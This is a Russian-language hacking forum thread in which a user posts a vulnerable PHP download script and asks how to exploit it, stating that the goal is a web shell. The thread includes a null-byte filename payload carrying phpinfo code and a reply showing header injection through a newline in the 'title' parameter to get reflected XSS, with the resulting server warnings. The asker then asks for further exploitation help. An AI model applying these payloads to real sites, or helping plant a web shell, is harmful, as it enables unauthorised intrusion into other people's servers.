можно ли как то использовать как уязвимость код в php PHP: <? echo($_GET["output"]); ?> Спасибо заранее
PHP: <? include_once( "include.php" ); if( isset( $_GET["output"] )) $output = urldecode( $_GET["output"] ); else $output = ""; if( isset( $_GET["title"] )) $title = $_GET["title"]; else $title = ""; $len = strlen( $output ); $todaysdate = date("d-M-Y"); header("Cache-control: private"); header("Content-Disposition: attachment; filename=".$title."Report".$todaysdate.".xls"); header("Content-Type: application/octet-outputeam"); header("Content-Length: $len"); header("Connection: close"); header("Expires: 0"); echo($output); ?> А вообще интересует следующий кусок кода. При запросе PHP: http://site.com/file.php?title=123.php%00&output=<? phpinfo(); ?> скачиваю файл 123.php c содержимым PHP: <? phpinfo(); ?> Как то можно это использовать. Конечная цель - веб шелл.
Врятли это както можно использовать только если xss там проскочит, а так скорее всего прав на выполнение нет..
а при чем тут права? можно поподробнее? надо заставить по сути файл выполнятся вместо того что бы он скачивался.
Для того, чтобы получить XSS, нужно сорвать процесс "скачки", а для этого необходимо сорвать header(), к примеру, параметр в header не поддерживает не однострочные текста. Code: ?output=%3Cscript%3Ealert%281%29%3C/script%3E&title=%0A Получаем: Code: <br /> <b>Warning</b>: Header may not contain more than a single header, new line detected. in <b>Q:\xampp\xampp\files\echo.php</b> on line <b>16</b><br /> <br /> <b>Warning</b>: Cannot modify header information - headers already sent by (output started at Q:\xampp\xampp\files\echo.php:16) in <b>Q:\xampp\xampp\files\echo.php</b> on line <b>17</b><br /> <br /> <b>Warning</b>: Cannot modify header information - headers already sent by (output started at Q:\xampp\xampp\files\echo.php:16) in <b>Q:\xampp\xampp\files\echo.php</b> on line <b>18</b><br /> <br /> <b>Warning</b>: Cannot modify header information - headers already sent by (output started at Q:\xampp\xampp\files\echo.php:16) in <b>Q:\xampp\xampp\files\echo.php</b> on line <b>20</b><br /> <br /> <b>Warning</b>: Cannot modify header information - headers already sent by (output started at Q:\xampp\xampp\files\echo.php:16) in <b>Q:\xampp\xampp\files\echo.php</b> on line <b>21</b><br /> <script>alert(1)</script>
Уважаемый Rebz Могу ли я попросить привести пример непосредственно к коду который я выложил выше. Я долгое время пытался разобраться сам, но мой англ желает лучшего. В итоге мы получим XSS или все таки можно будет использовать PHP? Заранее благодарен А за ссылку огромнейшее спасибо. Больше обрадовался что есть чему то научиться, чем возможности эксплуатации уязвимости. И личный вопрос, если можно, ты входишь в команду ONSEC?